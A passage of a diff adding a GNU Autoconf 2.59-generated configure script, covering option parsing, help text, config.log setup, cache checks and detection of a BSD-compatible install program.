\ + | -silent | --silent | --silen | --sile | --sil) + silent=yes ;; + + -sbindir | --sbindir | --sbindi | --sbind | --sbin | --sbi | --sb) + ac_prev=sbindir ;; + -sbindir=* | --sbindir=* | --sbindi=* | --sbind=* | --sbin=* \ + | --sbi=* | --sb=*) + sbindir=$ac_optarg ;; + + -sharedstatedir | --sharedstatedir | --sharedstatedi \ + | --sharedstated | --sharedstate | --sharedstat | --sharedsta \ + | --sharedst | --shareds | --shared | --share | --shar \ + | --sha | --sh) + ac_prev=sharedstatedir ;; + -sharedstatedir=* | --sharedstatedir=* | --sharedstatedi=* \ + | --sharedstated=* | --sharedstate=* | --sharedstat=* | --sharedsta=* \ + | --sharedst=* | --shareds=* | --shared=* | --share=* | --shar=* \ + | --sha=* | --sh=*) + sharedstatedir=$ac_optarg ;; + + -site | --site | --sit) + ac_prev=site ;; + -site=* | --site=* | --sit=*) + site=$ac_optarg ;; + + -srcdir | --srcdir | --srcdi | --srcd | --src | --sr) + ac_prev=srcdir ;; + -srcdir=* | --srcdir=* | --srcdi=* | --srcd=* | --src=* | --sr=*) + srcdir=$ac_optarg ;; + + -sysconfdir | --sysconfdir | --sysconfdi | --sysconfd | --sysconf \ + | --syscon | --sysco | --sysc | --sys | --sy) + ac_prev=sysconfdir ;; + -sysconfdir=* | --sysconfdir=* | --sysconfdi=* | --sysconfd=* | --sysconf=* \ + | --syscon=* | --sysco=* | --sysc=* | --sys=* | --sy=*) + sysconfdir=$ac_optarg ;; + + -target | --target | --targe | --targ | --tar | --ta | --t) + ac_prev=target_alias ;; + -target=* | --target=* | --targe=* | --targ=* | --tar=* | --ta=* | --t=*) + target_alias=$ac_optarg ;; + + -v | -verbose | --verbose | --verbos | --verbo | --verb) + verbose=yes ;; + + -version | --version | --versio | --versi | --vers | -V) + ac_init_version=: ;; + + -with-* | --with-*) + ac_package=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_package" : ".*[^-_$as_cr_alnum]" >/dev/null && + { echo "$as_me: error: invalid package name: $ac_package" >&2 + { (exit 1); exit 1; }; } + ac_package=`echo $ac_package| sed 's/-/_/g'` + case $ac_option in + *=*) ac_optarg=`echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"`;; + *) ac_optarg=yes ;; + esac + eval "with_$ac_package='$ac_optarg'" ;; + + -without-* | --without-*) + ac_package=`expr "x$ac_option" : 'x-*without-\(.*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_package" : ".*[^-_$as_cr_alnum]" >/dev/null && + { echo "$as_me: error: invalid package name: $ac_package" >&2 + { (exit 1); exit 1; }; } + ac_package=`echo $ac_package | sed 's/-/_/g'` + eval "with_$ac_package=no" ;; + + --x) + # Obsolete; use --with-x. + with_x=yes ;; + + -x-includes | --x-includes | --x-include | --x-includ | --x-inclu \ + | --x-incl | --x-inc | --x-in | --x-i) + ac_prev=x_includes ;; + -x-includes=* | --x-includes=* | --x-include=* | --x-includ=* | --x-inclu=* \ + | --x-incl=* | --x-inc=* | --x-in=* | --x-i=*) + x_includes=$ac_optarg ;; + + -x-libraries | --x-libraries | --x-librarie | --x-librari \ + | --x-librar | --x-libra | --x-libr | --x-lib | --x-li | --x-l) + ac_prev=x_libraries ;; + -x-libraries=* | --x-libraries=* | --x-librarie=* | --x-librari=* \ + | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) + x_libraries=$ac_optarg ;; + + -*) { echo "$as_me: error: unrecognized option: $ac_option +Try \`$0 --help' for more information." >&2 + { (exit 1); exit 1; }; } + ;; + + *=*) + ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='` + # Reject names that are not valid shell variable names. + expr "x$ac_envvar" : ".*[^_$as_cr_alnum]" >/dev/null && + { echo "$as_me: error: invalid variable name: $ac_envvar" >&2 + { (exit 1); exit 1; }; } + ac_optarg=`echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` + eval "$ac_envvar='$ac_optarg'" + export $ac_envvar ;; + + *) + # FIXME: should be removed in autoconf 3.0. + echo "$as_me: WARNING: you should use --build, --host, --target" >&2 + expr "x$ac_option" : ".*[^-._$as_cr_alnum]" >/dev/null && + echo "$as_me: WARNING: invalid host type: $ac_option" >&2 + : ${build_alias=$ac_option} ${host_alias=$ac_option} ${target_alias=$ac_option} + ;; + + esac +done + +if test -n "$ac_prev"; then + ac_option=--`echo $ac_prev | sed 's/_/-/g'` + { echo "$as_me: error: missing argument to $ac_option" >&2 + { (exit 1); exit 1; }; } +fi + +# Be sure to have absolute paths. +for ac_var in exec_prefix prefix +do + eval ac_val=$`echo $ac_var` + case $ac_val in + [\\/$]* | ?:[\\/]* | NONE | '' ) ;; + *) { echo "$as_me: error: expected an absolute directory name for --$ac_var: $ac_val" >&2 + { (exit 1); exit 1; }; };; + esac +done + +# Be sure to have absolute paths. +for ac_var in bindir sbindir libexecdir datadir sysconfdir sharedstatedir \ + localstatedir libdir includedir oldincludedir infodir mandir +do + eval ac_val=$`echo $ac_var` + case $ac_val in + [\\/$]* | ?:[\\/]* ) ;; + *) { echo "$as_me: error: expected an absolute directory name for --$ac_var: $ac_val" >&2 + { (exit 1); exit 1; }; };; + esac +done + +# There might be people who depend on the old broken behavior: `$host' +# used to hold the argument of --host etc. +# FIXME: To remove some day. +build=$build_alias +host=$host_alias +target=$target_alias + +# FIXME: To remove some day. +if test "x$host_alias" != x; then + if test "x$build_alias" = x; then + cross_compiling=maybe + echo "$as_me: WARNING: If you wanted to set the --build type, don't use --host. + If a cross compiler is detected then cross compile mode will be used." >&2 + elif test "x$build_alias" != "x$host_alias"; then + cross_compiling=yes + fi +fi + +ac_tool_prefix= +test -n "$host_alias" && ac_tool_prefix=$host_alias- + +test "$silent" = yes && exec 6>/dev/null + + +# Find the source files, if location was not specified. +if test -z "$srcdir"; then + ac_srcdir_defaulted=yes + # Try the directory containing this script, then its parent. + ac_confdir=`(dirname "$0") 2>/dev/null || +$as_expr X"$0" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$0" : 'X\(//\)[^/]' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)' \| \ + . : '\(.\)' 2>/dev/null || +echo X"$0" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/; q; } + /^X\(\/\/\)[^/].*/{ s//\1/; q; } + /^X\(\/\/\)$/{ s//\1/; q; } + /^X\(\/\).*/{ s//\1/; q; } + s/.*/./; q'` + srcdir=$ac_confdir + if test ! -r $srcdir/$ac_unique_file; then + srcdir=.. + fi +else + ac_srcdir_defaulted=no +fi +if test ! -r $srcdir/$ac_unique_file; then + if test "$ac_srcdir_defaulted" = yes; then + { echo "$as_me: error: cannot find sources ($ac_unique_file) in $ac_confdir or .." >&2 + { (exit 1); exit 1; }; } + else + { echo "$as_me: error: cannot find sources ($ac_unique_file) in $srcdir" >&2 + { (exit 1); exit 1; }; } + fi +fi +(cd $srcdir && test -r ./$ac_unique_file) 2>/dev/null || + { echo "$as_me: error: sources are in $srcdir, but \`cd $srcdir' does not work" >&2 + { (exit 1); exit 1; }; } +srcdir=`echo "$srcdir" | sed 's%\([^\\/]\)[\\/]*$%\1%'` +ac_env_build_alias_set=${build_alias+set} +ac_env_build_alias_value=$build_alias +ac_cv_env_build_alias_set=${build_alias+set} +ac_cv_env_build_alias_value=$build_alias +ac_env_host_alias_set=${host_alias+set} +ac_env_host_alias_value=$host_alias +ac_cv_env_host_alias_set=${host_alias+set} +ac_cv_env_host_alias_value=$host_alias +ac_env_target_alias_set=${target_alias+set} +ac_env_target_alias_value=$target_alias +ac_cv_env_target_alias_set=${target_alias+set} +ac_cv_env_target_alias_value=$target_alias +ac_env_CC_set=${CC+set} +ac_env_CC_value=$CC +ac_cv_env_CC_set=${CC+set} +ac_cv_env_CC_value=$CC +ac_env_CFLAGS_set=${CFLAGS+set} +ac_env_CFLAGS_value=$CFLAGS +ac_cv_env_CFLAGS_set=${CFLAGS+set} +ac_cv_env_CFLAGS_value=$CFLAGS +ac_env_LDFLAGS_set=${LDFLAGS+set} +ac_env_LDFLAGS_value=$LDFLAGS +ac_cv_env_LDFLAGS_set=${LDFLAGS+set} +ac_cv_env_LDFLAGS_value=$LDFLAGS +ac_env_CPPFLAGS_set=${CPPFLAGS+set} +ac_env_CPPFLAGS_value=$CPPFLAGS +ac_cv_env_CPPFLAGS_set=${CPPFLAGS+set} +ac_cv_env_CPPFLAGS_value=$CPPFLAGS +ac_env_CPP_set=${CPP+set} +ac_env_CPP_value=$CPP +ac_cv_env_CPP_set=${CPP+set} +ac_cv_env_CPP_value=$CPP + +# +# Report the --help message. +# +if test "$ac_init_help" = "long"; then + # Omit some internal or obsolete options to make the list less imposing. + # This message is too long to be a string in the A/UX 3.1 sh. + cat <<_ACEOF +\`configure' configures this package to adapt to many kinds of systems. + +Usage: $0 [OPTION]... [VAR=VALUE]... + +To assign environment variables (e.g., CC, CFLAGS...), specify them as +VAR=VALUE. See below for descriptions of some of the useful variables. + +Defaults for the options are specified in brackets. + +Configuration: + -h, --help display this help and exit + --help=short display options specific to this package + --help=recursive display the short help of all the included packages + -V, --version display version information and exit + -q, --quiet, --silent do not print \`checking...' messages + --cache-file=FILE cache test results in FILE [disabled] + -C, --config-cache alias for \`--cache-file=config.cache' + -n, --no-create do not create output files + --srcdir=DIR find the sources in DIR [configure dir or \`..'] + +_ACEOF + + cat <<_ACEOF +Installation directories: + --prefix=PREFIX install architecture-independent files in PREFIX + [$ac_default_prefix] + --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX + [PREFIX] + +By default, \`make install' will install all the files in +\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc. You can specify +an installation prefix other than \`$ac_default_prefix' using \`--prefix', +for instance \`--prefix=\$HOME'. + +For better control, use the options below. + +Fine tuning of the installation directories: + --bindir=DIR user executables [EPREFIX/bin] + --sbindir=DIR system admin executables [EPREFIX/sbin] + --libexecdir=DIR program executables [EPREFIX/libexec] + --datadir=DIR read-only architecture-independent data [PREFIX/share] + --sysconfdir=DIR read-only single-machine data [PREFIX/etc] + --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] + --localstatedir=DIR modifiable single-machine data [PREFIX/var] + --libdir=DIR object code libraries [EPREFIX/lib] + --includedir=DIR C header files [PREFIX/include] + --oldincludedir=DIR C header files for non-gcc [/usr/include] + --infodir=DIR info documentation [PREFIX/info] + --mandir=DIR man documentation [PREFIX/man] +_ACEOF + + cat <<\_ACEOF + +Program names: + --program-prefix=PREFIX prepend PREFIX to installed program names + --program-suffix=SUFFIX append SUFFIX to installed program names + --program-transform-name=PROGRAM run sed PROGRAM on installed program names +_ACEOF +fi + +if test -n "$ac_init_help"; then + + cat <<\_ACEOF + +Optional Features: + --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) + --enable-FEATURE[=ARG] include FEATURE [ARG=yes] + --enable-maintainer-mode enable make rules and dependencies not useful + (and sometimes confusing) to the casual installer + +Some influential environment variables: + CC C compiler command + CFLAGS C compiler flags + LDFLAGS linker flags, e.g. -L if you have libraries in a + nonstandard directory + CPPFLAGS C/C++ preprocessor flags, e.g. -I if you have + headers in a nonstandard directory + CPP C preprocessor + +Use these variables to override the choices made by `configure' or to help +it to find libraries and programs with nonstandard names/locations. + +_ACEOF +fi + +if test "$ac_init_help" = "recursive"; then + # If there are subdirs, report their specific --help. + ac_popdir=`pwd` + for ac_dir in : $ac_subdirs_all; do test "x$ac_dir" = x: && continue + test -d $ac_dir || continue + ac_builddir=. + +if test "$ac_dir" != .; then + ac_dir_suffix=/`echo "$ac_dir" | sed 's,^\.[\\/],,'` + # A "../" for each directory in $ac_dir_suffix. + ac_top_builddir=`echo "$ac_dir_suffix" | sed 's,/[^\\/]*,../,g'` +else + ac_dir_suffix= ac_top_builddir= +fi + +case $srcdir in + .) # No --srcdir option. We are building in place. + ac_srcdir=. + if test -z "$ac_top_builddir"; then + ac_top_srcdir=. + else + ac_top_srcdir=`echo $ac_top_builddir | sed 's,/$,,'` + fi ;; + [\\/]* | ?:[\\/]* ) # Absolute path. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir ;; + *) # Relative path. + ac_srcdir=$ac_top_builddir$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_builddir$srcdir ;; +esac + +# Do not use `cd foo && pwd` to compute absolute paths, because +# the directories may not exist. +case `pwd` in +.) ac_abs_builddir="$ac_dir";; +*) + case "$ac_dir" in + .) ac_abs_builddir=`pwd`;; + [\\/]* | ?:[\\/]* ) ac_abs_builddir="$ac_dir";; + *) ac_abs_builddir=`pwd`/"$ac_dir";; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_top_builddir=${ac_top_builddir}.;; +*) + case ${ac_top_builddir}. in + .) ac_abs_top_builddir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_top_builddir=${ac_top_builddir}.;; + *) ac_abs_top_builddir=$ac_abs_builddir/${ac_top_builddir}.;; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_srcdir=$ac_srcdir;; +*) + case $ac_srcdir in + .) ac_abs_srcdir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_srcdir=$ac_srcdir;; + *) ac_abs_srcdir=$ac_abs_builddir/$ac_srcdir;; + esac;; +esac +case $ac_abs_builddir in +.) ac_abs_top_srcdir=$ac_top_srcdir;; +*) + case $ac_top_srcdir in + .) ac_abs_top_srcdir=$ac_abs_builddir;; + [\\/]* | ?:[\\/]* ) ac_abs_top_srcdir=$ac_top_srcdir;; + *) ac_abs_top_srcdir=$ac_abs_builddir/$ac_top_srcdir;; + esac;; +esac + + cd $ac_dir + # Check for guested configure; otherwise get Cygnus style configure. + if test -f $ac_srcdir/configure.gnu; then + echo + $SHELL $ac_srcdir/configure.gnu --help=recursive + elif test -f $ac_srcdir/configure; then + echo + $SHELL $ac_srcdir/configure --help=recursive + elif test -f $ac_srcdir/configure.ac || + test -f $ac_srcdir/configure.in; then + echo + $ac_configure --help + else + echo "$as_me: WARNING: no configuration information is in $ac_dir" >&2 + fi + cd $ac_popdir + done +fi + +test -n "$ac_init_help" && exit 0 +if $ac_init_version; then + cat <<\_ACEOF + +Copyright (C) 2003 Free Software Foundation, Inc. +This configure script is free software; the Free Software Foundation +gives unlimited permission to copy, distribute and modify it. +_ACEOF + exit 0 +fi +exec 5>config.log +cat >&5 <<_ACEOF +This file contains any messages produced by compilers while +running configure, to aid debugging if configure makes a mistake. + +It was created by $as_me, which was +generated by GNU Autoconf 2.59. Invocation command line was + + $ $0 $@ + +_ACEOF +{ +cat <<_ASUNAME +## --------- ## +## Platform. ## +## --------- ## + +hostname = `(hostname || uname -n) 2>/dev/null | sed 1q` +uname -m = `(uname -m) 2>/dev/null || echo unknown` +uname -r = `(uname -r) 2>/dev/null || echo unknown` +uname -s = `(uname -s) 2>/dev/null || echo unknown` +uname -v = `(uname -v) 2>/dev/null || echo unknown` + +/usr/bin/uname -p = `(/usr/bin/uname -p) 2>/dev/null || echo unknown` +/bin/uname -X = `(/bin/uname -X) 2>/dev/null || echo unknown` + +/bin/arch = `(/bin/arch) 2>/dev/null || echo unknown` +/usr/bin/arch -k = `(/usr/bin/arch -k) 2>/dev/null || echo unknown` +/usr/convex/getsysinfo = `(/usr/convex/getsysinfo) 2>/dev/null || echo unknown` +hostinfo = `(hostinfo) 2>/dev/null || echo unknown` +/bin/machine = `(/bin/machine) 2>/dev/null || echo unknown` +/usr/bin/oslevel = `(/usr/bin/oslevel) 2>/dev/null || echo unknown` +/bin/universe = `(/bin/universe) 2>/dev/null || echo unknown` + +_ASUNAME + +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + echo "PATH: $as_dir" +done + +} >&5 + +cat >&5 <<_ACEOF + + +## ----------- ## +## Core tests. ## +## ----------- ## + +_ACEOF + + +# Keep a trace of the command line. +# Strip out --no-create and --no-recursion so they do not pile up. +# Strip out --silent because we don't want to record it for future runs. +# Also quote any args containing shell meta-characters. +# Make two passes to allow for proper duplicate-argument suppression. +ac_configure_args= +ac_configure_args0= +ac_configure_args1= +ac_sep= +ac_must_keep_next=false +for ac_pass in 1 2 +do + for ac_arg + do + case $ac_arg in + -no-create | --no-c* | -n | -no-recursion | --no-r*) continue ;; + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil) + continue ;; + *" "*|*" "*|*[\[\]\~\#\$\^\&\*\(\)\{\}\\\|\;\<\>\?\"\']*) + ac_arg=`echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + case $ac_pass in + 1) ac_configure_args0="$ac_configure_args0 '$ac_arg'" ;; + 2) + ac_configure_args1="$ac_configure_args1 '$ac_arg'" + if test $ac_must_keep_next = true; then + ac_must_keep_next=false # Got value, back to normal. + else + case $ac_arg in + *=* | --config-cache | -C | -disable-* | --disable-* \ + | -enable-* | --enable-* | -gas | --g* | -nfp | --nf* \ + | -q | -quiet | --q* | -silent | --sil* | -v | -verb* \ + | -with-* | --with-* | -without-* | --without-* | --x) + case "$ac_configure_args0 " in + "$ac_configure_args1"*" '$ac_arg' "* ) continue ;; + esac + ;; + -* ) ac_must_keep_next=true ;; + esac + fi + ac_configure_args="$ac_configure_args$ac_sep'$ac_arg'" + # Get rid of the leading space. + ac_sep=" " + ;; + esac + done +done +$as_unset ac_configure_args0 || test "${ac_configure_args0+set}" != set || { ac_configure_args0=; export ac_configure_args0; } +$as_unset ac_configure_args1 || test "${ac_configure_args1+set}" != set || { ac_configure_args1=; export ac_configure_args1; } + +# When interrupted or exit'd, cleanup temporary files, and complete +# config.log. We remove comments because anyway the quotes in there +# would cause problems or look ugly. +# WARNING: Be sure not to use single quotes in there, as some shells, +# such as our DU 5.0 friend, will then `close' the trap. +trap 'exit_status=$? + # Save into config.log some information that might help in debugging. + { + echo + + cat <<\_ASBOX +## ---------------- ## +## Cache variables. ## +## ---------------- ## +_ASBOX + echo + # The following way of writing the cache mishandles newlines in values, +{ + (set) 2>&1 | + case `(ac_space='"'"' '"'"'; set | grep ac_space) 2>&1` in + *ac_space=\ *) + sed -n \ + "s/'"'"'/'"'"'\\\\'"'"''"'"'/g; + s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='"'"'\\2'"'"'/p" + ;; + *) + sed -n \ + "s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1=\\2/p" + ;; + esac; +} + echo + + cat <<\_ASBOX +## ----------------- ## +## Output variables. ## +## ----------------- ## +_ASBOX + echo + for ac_var in $ac_subst_vars + do + eval ac_val=$`echo $ac_var` + echo "$ac_var='"'"'$ac_val'"'"'" + done | sort + echo + + if test -n "$ac_subst_files"; then + cat <<\_ASBOX +## ------------- ## +## Output files. ## +## ------------- ## +_ASBOX + echo + for ac_var in $ac_subst_files + do + eval ac_val=$`echo $ac_var` + echo "$ac_var='"'"'$ac_val'"'"'" + done | sort + echo + fi + + if test -s confdefs.h; then + cat <<\_ASBOX +## ----------- ## +## confdefs.h. ## +## ----------- ## +_ASBOX + echo + sed "/^$/d" confdefs.h | sort + echo + fi + test "$ac_signal" != 0 && + echo "$as_me: caught signal $ac_signal" + echo "$as_me: exit $exit_status" + } >&5 + rm -f core *.core && + rm -rf conftest* confdefs* conf$$* $ac_clean_files && + exit $exit_status + ' 0 +for ac_signal in 1 2 13 15; do + trap 'ac_signal='$ac_signal'; { (exit 1); exit 1; }' $ac_signal +done +ac_signal=0 + +# confdefs.h avoids OS command line length limits that DEFS can exceed. +rm -rf conftest* confdefs.h +# AIX cpp loses on an empty file, so make sure it contains at least a newline. +echo >confdefs.h + +# Predefined preprocessor variables. + +cat >>confdefs.h <<_ACEOF +#define PACKAGE_NAME "$PACKAGE_NAME" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +#define PACKAGE_TARNAME "$PACKAGE_TARNAME" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +#define PACKAGE_VERSION "$PACKAGE_VERSION" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +#define PACKAGE_STRING "$PACKAGE_STRING" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +#define PACKAGE_BUGREPORT "$PACKAGE_BUGREPORT" +_ACEOF + + +# Let the site file select an alternate cache file if it wants to. +# Prefer explicitly selected file to automatically selected ones. +if test -z "$CONFIG_SITE"; then + if test "x$prefix" != xNONE; then + CONFIG_SITE="$prefix/share/config.site $prefix/etc/config.site" + else + CONFIG_SITE="$ac_default_prefix/share/config.site $ac_default_prefix/etc/config.site" + fi +fi +for ac_site_file in $CONFIG_SITE; do + if test -r "$ac_site_file"; then + { echo "$as_me:$LINENO: loading site script $ac_site_file" >&5 +echo "$as_me: loading site script $ac_site_file" >&6;} + sed 's/^/| /' "$ac_site_file" >&5 + . "$ac_site_file" + fi +done + +if test -r "$cache_file"; then + # Some versions of bash will fail to source /dev/null (special + # files actually), so we avoid doing that. + if test -f "$cache_file"; then + { echo "$as_me:$LINENO: loading cache $cache_file" >&5 +echo "$as_me: loading cache $cache_file" >&6;} + case $cache_file in + [\\/]* | ?:[\\/]* ) . $cache_file;; + *) . ./$cache_file;; + esac + fi +else + { echo "$as_me:$LINENO: creating cache $cache_file" >&5 +echo "$as_me: creating cache $cache_file" >&6;} + >$cache_file +fi + +# Check that the precious variables saved in the cache have kept the same +# value. +ac_cache_corrupted=false +for ac_var in `(set) 2>&1 | + sed -n 's/^ac_env_\([a-zA-Z_0-9]*\)_set=.*/\1/p'`; do + eval ac_old_set=\$ac_cv_env_${ac_var}_set + eval ac_new_set=\$ac_env_${ac_var}_set + eval ac_old_val="\$ac_cv_env_${ac_var}_value" + eval ac_new_val="\$ac_env_${ac_var}_value" + case $ac_old_set,$ac_new_set in + set,) + { echo "$as_me:$LINENO: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5 +echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;} + ac_cache_corrupted=: ;; + ,set) + { echo "$as_me:$LINENO: error: \`$ac_var' was not set in the previous run" >&5 +echo "$as_me: error: \`$ac_var' was not set in the previous run" >&2;} + ac_cache_corrupted=: ;; + ,);; + *) + if test "x$ac_old_val" != "x$ac_new_val"; then + { echo "$as_me:$LINENO: error: \`$ac_var' has changed since the previous run:" >&5 +echo "$as_me: error: \`$ac_var' has changed since the previous run:" >&2;} + { echo "$as_me:$LINENO: former value: $ac_old_val" >&5 +echo "$as_me: former value: $ac_old_val" >&2;} + { echo "$as_me:$LINENO: current value: $ac_new_val" >&5 +echo "$as_me: current value: $ac_new_val" >&2;} + ac_cache_corrupted=: + fi;; + esac + # Pass precious variables to config.status. + if test "$ac_new_set" = set; then + case $ac_new_val in + *" "*|*" "*|*[\[\]\~\#\$\^\&\*\(\)\{\}\\\|\;\<\>\?\"\']*) + ac_arg=$ac_var=`echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; + *) ac_arg=$ac_var=$ac_new_val ;; + esac + case " $ac_configure_args " in + *" '$ac_arg' "*) ;; # Avoid dups. Use of quotes ensures accuracy. + *) ac_configure_args="$ac_configure_args '$ac_arg'" ;; + esac + fi +done +if $ac_cache_corrupted; then + { echo "$as_me:$LINENO: error: changes in the environment can compromise the build" >&5 +echo "$as_me: error: changes in the environment can compromise the build" >&2;} + { { echo "$as_me:$LINENO: error: run \`make distclean' and/or \`rm $cache_file' and start over" >&5 +echo "$as_me: error: run \`make distclean' and/or \`rm $cache_file' and start over" >&2;} + { (exit 1); exit 1; }; } +fi + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + + + + + + + + + + + + + + + + + + + +am__api_version="1.4" +ac_aux_dir= +for ac_dir in $srcdir $srcdir/.. $srcdir/../..; do + if test -f $ac_dir/install-sh; then + ac_aux_dir=$ac_dir + ac_install_sh="$ac_aux_dir/install-sh -c" + break + elif test -f $ac_dir/install.sh; then + ac_aux_dir=$ac_dir + ac_install_sh="$ac_aux_dir/install.sh -c" + break + elif test -f $ac_dir/shtool; then + ac_aux_dir=$ac_dir + ac_install_sh="$ac_aux_dir/shtool install -c" + break + fi +done +if test -z "$ac_aux_dir"; then + { { echo "$as_me:$LINENO: error: cannot find install-sh or install.sh in $srcdir $srcdir/.. $srcdir/../.." >&5 +echo "$as_me: error: cannot find install-sh or install.sh in $srcdir $srcdir/.. $srcdir/../.." >&2;} + { (exit 1); exit 1; }; } +fi +ac_config_guess="$SHELL $ac_aux_dir/config.guess" +ac_config_sub="$SHELL $ac_aux_dir/config.sub" +ac_configure="$SHELL $ac_aux_dir/configure" # This should be Cygnus configure. + +# Find a good install program. We prefer a C program (faster), +# so one script is as good as another. But avoid the broken or +# incompatible versions: +# SysV /etc/install, /usr/sbin/install +# SunOS /usr/etc/install +# IRIX /sbin/install +# AIX /bin/install +# AmigaOS /C/install, which installs bootblocks on floppy discs +# AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag +# AFS /usr/afsws/bin/install, which mishandles nonexistent args +# SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" +# OS/2's system install, which has a completely different semantic +# ./install, which can be erroneously created by make from ./install.sh. +echo "$as_me:$LINENO: checking for a BSD-compatible install" >&5 +echo $ECHO_N "checking for a BSD-compatible install... $ECHO_C" >&6 +if test -z "$INSTALL"; then +if test "${ac_cv_path_install+set}" = set; then + echo $ECHO_N "(cached) $ECHO_C" >&6 +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + # Account for people who put trailing slashes in PATH elements. +case $as_dir/ in + ./ | .// | /cC/* | \ + /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ + ?:\\/os2\\/install\\/* | ?:\\/OS2\\/INSTALL\\/* | \ + /usr/ucb/* ) ;; + *) + # OSF1 and SCO ODT 3.0 have their own names for install. + # Don't use installbsd from OSF since it installs stuff as root + # by default. + for ac_prog in ginstall scoinst install; do + for ac_exec_ext in '' $ac_executable_extensions; do + if $as_executable_p "$as_dir/$ac_prog$ac_exec_ext"; then + if test $ac_prog = install && + grep dspmsg "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then + # AIX install. It has an incompatible calling convention. + : + elif test $ac_prog = install && + grep pwplus "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then + # program-specific install script used by HP pwplus--don't use. + : + else + ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" + break 3 + fi + fi + done + done + ;; +esac +done + + +fi + if test "${ac_cv_path_install+set}" = set; then + INSTALL=$ac_cv_path_install + else + # As a last resort, use the slow shell script. We don't cache a + # path for INSTALL within a source directory, because that will + # break other packages using the cache if that directory is + # removed, or if the path is relative. + INSTALL=$ac_install_sh + fi +fi +echo "$as_me:$LINENO: result: $INSTALL" >&5 +echo "${ECHO_T}$INSTALL" >&6 + +# Use test -z because SunOS4 sh mishandles braces in ${var-val}. +# It thinks the first close brace ends the variable substitution. +test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' + +test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' + +test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' + +echo "$as_me:$LINENO: checking whether build environment is sane" >&5 +echo $ECHO_N "checking whether build environment is sane... $ECHO_C" >&6 +# Just in case +sleep 1 +echo timestamp > conftestfile +# Do `set' in a subshell so we don't clobber the current shell's +# arguments. Must try -L first in case configure is actually a +# symlink; some systems play weird games with the mod time of symlinks +# (eg FreeBSD returns the mod time of the symlink's containing +# directory). +if ( + set X `ls -Lt $srcdir/configure conftestfile 2> /dev/null` + if test "$*" = "X"; then + # -L didn't work. + set X `ls -t $srcdir/configure conftestfile` + fi + if test "$*" != "X $srcdir/configure conftestfile" \ + && test "$*" != "X conftestfile $srcdir/configure"; then + + # If neither matched, then we have a broken ls. This can happen + # if, for instance, CONFIG_SHELL is bash and it inherits a + # broken ls alias from the environment. This has actually + # happened. Such a system could not be considered "sane". + { { echo "$as_me:$LINENO: error: ls -t appears to fail. Make sure there is not a broken +alias in your environment" >&5 +echo "$as_me: error: ls -t appears to fail. Make sure there is not a broken +alias in your environment" >&2;} + { (exit 1); exit 1; }; } + fi + + test "$2" = conftestfile + ) +then + # Ok. + : +else + { { echo "$as_me:$LINENO: error: newly created file is older than distributed files! +Check your system clock" >&5 +echo "$as_me: error: newly created file is older than distributed files! +Check your system clock" >&2;} + { (exit 1); exit 1; }; } +fi +rm -f conftest* +echo "$as_me:$LINENO: result: yes" >&5 +echo "${ECHO_T}yes" >&6 +test "$program_prefix" != NONE && + program_transform_name="s,^,$program_prefix,;$program_transform_name" +# Use a double $ so make ignores it. +test "$program_suffix" != NONE && + program_transform_name="s,\$,$program_suffix,;$program_transform_name" +# Double any \ or $. echo might interpret backslashes. +# By default was `s,x,x', remove it if useless. +cat <<\_ACEOF >conftest.sed +s/[\\$]/&&/g;s/;s,x,x,$// +_ACEOF +program_transform_name=`echo $program_transform_name | sed -f conftest.sed` +rm conftest.sed + +echo "$as_me:$LINENO: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +echo $ECHO_N 